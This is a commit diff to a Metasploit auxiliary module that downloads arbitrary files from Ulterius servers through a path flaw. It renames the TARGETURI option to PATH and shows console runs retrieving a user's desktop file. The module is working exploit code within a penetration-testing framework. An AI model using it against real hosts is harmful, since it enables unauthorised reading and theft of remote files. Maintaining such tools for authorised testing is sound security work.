Avoid target_uri.path

It doesn't look like target_uri.path is suitable for this scenario,
because it causes our input to be modified and hard to use.

documentation/modules/auxiliary/admin/http/ulterius_file_download.md

@@ -22,7 +22,7 @@ Note: The [EDB PoC](https://www.exploit-db.com/exploits/43141/) used relative pa
 
 ## Options
 
-**TARGETURI**
+**PATH**
 
 This option specifies the absolute or relative path of the file to download. (default: `/…/fileIndex.db`)
 
@@ -36,7 +36,7 @@ Note: If you are using relative paths, use three periods when traversing down a
 - [ ] `set rhost <rhost>`
 - [ ] `run`
 - [ ] Verify loot contains file system paths from remote file system.
-- [ ] `set targeturi '/<DriveLetter>:/<path>/<to>/<file>'`
+- [ ] `set path '<DriveLetter>:/<path>/<to>/<file>'`
 - [ ] `run`
 - [ ] Verify contents of file
 
@@ -53,11 +53,11 @@ msf5 auxiliary(admin/http/ulterius_file_download) > run
 [*] Starting to parse fileIndex.db...
 [*] Remote file paths saved in: filepath0
 [*] Auxiliary module execution completed
-msf5 auxiliary(admin/http/ulterius_file_download) > set targeturi '/C:/users/pwnduser/desktop/tmp.txt'
+msf5 auxiliary(admin/http/ulterius_file_download) > set path 'C:/users/pwnduser/desktop/tmp.txt'
-targeturi => /C:/users/pwnduser/desktop/tmp.txt
+path => C:/users/pwnduser/desktop/tmp.txt
 msf5 auxiliary(admin/http/ulterius_file_download) > run
 
-[*] /C:/users/pwnduser/desktop/tmp.txt
+[*] C:/users/pwnduser/desktop/tmp.txt
 [*] File contents saved: filepath1
 [*] Auxiliary module execution completed
 msf5 auxiliary(admin/http/ulterius_file_download) >

modules/auxiliary/admin/http/ulterius_file_download.rb

@@ -35,7 +35,7 @@ class MetasploitModule < Msf::Auxiliary
       register_options(
         [
           Opt::RPORT(22006),
-          OptString.new('TARGETURI', [true, 'Path to the file to download', '/.../fileIndex.db']),
+          OptString.new('PATH', [true, 'Path to the file to download', '/.../fileIndex.db']),
         ])
   end
 
@@ -73,9 +73,16 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run
+    path = datastore['PATH']
+    # Always make sure there is a starting slash so as an user,
+    # we don't need to worry about it.
+    path = "/#{path}" if path && path[0] != '/'
+
+    print_status("Requesting: #{path}")
+
     begin
       res = send_request_cgi({
-        'uri' => normalize_uri(target_uri.path),
+        'uri' => normalize_uri(path),
         'method' => 'GET'
       })
     rescue Rex::ConnectionRefused, Rex::ConnectionTimeout,
@@ -83,14 +90,15 @@ class MetasploitModule < Msf::Auxiliary
       vprint_error("Failed: #{e.class} - #{e.message}")
       return
     end
+
     if res && res.code == 200
-      if target_uri.path =~ /fileIndex\.db/i
+      if path =~ /fileIndex\.db/i
         inflate_parse(res.body)
       else
-        print_status(target_uri.path)
+        myloot = store_loot('ulterius.file.download', 'text/plain', datastore['RHOST'], res.body, path, 'Remote file system')
-        myloot = store_loot('ulterius.file.download', 'text/plain', datastore['RHOST'], res.body, target_uri.path, 'Remote file system')
         print_status("File contents saved: #{myloot.to_s}")
       end
     end
   end
+
 end